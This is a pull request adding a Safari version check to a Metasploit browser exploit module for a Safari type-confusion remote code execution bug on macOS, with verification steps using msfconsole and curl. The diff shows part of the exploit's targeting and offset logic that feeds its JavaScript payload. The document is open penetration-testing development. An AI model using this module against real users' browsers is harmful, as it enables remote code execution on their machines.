### PR TITLE
add version check to Safari RCE exploit

### DIFF
--- a/modules/exploits/osx/browser/safari_proxy_object_type_confusion.rb
+++ b/modules/exploits/osx/browser/safari_proxy_object_type_confusion.rb
@@ -98,14 +98,22 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def get_offsets(user_agent)
     if user_agent =~ /Intel Mac OS X (.*?)\)/
-      version = $1.gsub("_", ".")
-      mac_osx_version = Gem::Version.new(version)
+      osx_version = $1.gsub("_", ".")
+      if user_agent =~ /Version\/(.*?) /
+        if Gem::Version.new($1) >= Gem::Version.new('11.1.1')
+          print_warning "Safari version #{$1} is not vulnerable"
+          return false
+        else
+          print_good "Safari version #{$1} appears to be vulnerable"
+        end
+      end
+      mac_osx_version = Gem::Version.new(osx_version)
       if mac_osx_version >= Gem::Version.new('10.13.4')
         print_warning "macOS version #{mac_osx_version} is not vulnerable"
       elsif mac_osx_version < Gem::Version.new('10.12')
         print_warning "macOS version #{mac_osx_version} is not vulnerable"
-      elsif offset_table.key?(version)
-        offset = offset_table[version]
+      elsif offset_table.key?(osx_version)
+        offset = offset_table[osx_version]
         return <<-EOF
 const JSC_VTAB_OFFSET = #{offset[:jsc_vtab]};
 const DYLD_STUB_LOADER_OFFSET = #{offset[:dyld_stub_loader]};


### PR DESCRIPTION
Currently we're checking the OSX version, but not the Safari version.
This adds a quick check for the Safari version and prints a warning if it's not vulnerable.

## Verification

List the steps needed to make sure this thing works

- [x] Start `msfconsole`
- [x] `use exploit/osx/browser/safari_proxy_object_type_confusion`
- [x] `set LHOST 127.0.0.1`
- [x] `set URIPATH /w`
- [x] `exploit`
- [x] `curl http://127.0.0.1:8080/w -H "User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15"`
- [x] **Verify** you see "Safari version 12.0.2 is not vulnerable"

